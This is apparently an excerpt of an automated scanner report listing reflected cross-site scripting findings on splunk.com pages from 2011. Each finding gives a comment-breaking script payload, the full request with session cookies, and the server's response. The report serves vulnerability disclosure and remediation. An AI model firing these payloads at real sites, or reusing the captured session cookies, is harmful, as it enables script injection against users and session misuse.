<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7b5fc--><script>alert(1)</script>f57001f10c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view7b5fc--><script>alert(1)</script>f57001f10c5/benefits/SP-CAAACCS HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:33 GMT; path=/ ETag: d73159ade34a23a6ff7bfc893c9667cd1296944073 Last-Modified: Sat, 05 Feb 2011 22:14:33 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1a047--><script>alert(1)</script>60a40edd839 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/benefits1a047--><script>alert(1)</script>60a40edd839/SP-CAAACCS HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:06 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:06 GMT; path=/ ETag: eeec607825549ba0d5b647d9dcf9e23d1296944107 Last-Modified: Sat, 05 Feb 2011 22:15:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 276aa--><script>alert(1)</script>d1fc95e74a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/benefits/SP-CAAACCS276aa--><script>alert(1)</script>d1fc95e74a3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:40 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:40 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:40 GMT; path=/ ETag: 15661cf4c768ab99722c9d0cf5b106361296944140 Last-Modified: Sat, 05 Feb 2011 22:15:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.526. http://www.splunk.com/view/benefits/SP-CAAACCS [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/benefits/SP-CAAACCS
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3026b--><script>alert(1)</script>e2ce8ffbb79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/benefits/SP-CAAACCS?3026b--><script>alert(1)</script>e2ce8ffbb79=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 41f62084b25cf5cc695cda4f5daea6ed1296944038 Last-Modified: Sat, 05 Feb 2011 22:13:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 216fd--><script>alert(1)</script>bcbccd79d54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view216fd--><script>alert(1)</script>bcbccd79d54/business-analytics/SP-CAAAFXH HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:02 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:02 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:02 GMT; path=/ ETag: 33b50f47a85ee6840d607386e53546cd1296944163 Last-Modified: Sat, 05 Feb 2011 22:16:03 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 554ca--><script>alert(1)</script>600f61871ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/business-analytics554ca--><script>alert(1)</script>600f61871ef/SP-CAAAFXH HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:30 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:30 GMT; path=/ ETag: 0a427f120f19924b275e763c5e9862cb1296944191 Last-Modified: Sat, 05 Feb 2011 22:16:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 58755--><script>alert(1)</script>93df2ca7ad8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/business-analytics/SP-CAAAFXH58755--><script>alert(1)</script>93df2ca7ad8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.530. http://www.splunk.com/view/business-analytics/SP-CAAAFXH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/business-analytics/SP-CAAAFXH
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5ce8a--><script>alert(1)</script>273eeac0383 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/business-analytics/SP-CAAAFXH?5ce8a--><script>alert(1)</script>273eeac0383=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d6fec--><script>alert(1)</script>6766303683c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewd6fec--><script>alert(1)</script>6766303683c/careers/SP-CAAAAGG HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6c606--><script>alert(1)</script>25166e88644 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/careers6c606--><script>alert(1)</script>25166e88644/SP-CAAAAGG HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload cba06--><script>alert(1)</script>5161bd1b4b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/careers/SP-CAAAAGGcba06--><script>alert(1)</script>5161bd1b4b3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.534. http://www.splunk.com/view/careers/SP-CAAAAGG [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/careers/SP-CAAAAGG
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 267a6--><script>alert(1)</script>4fc3c5eb99e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
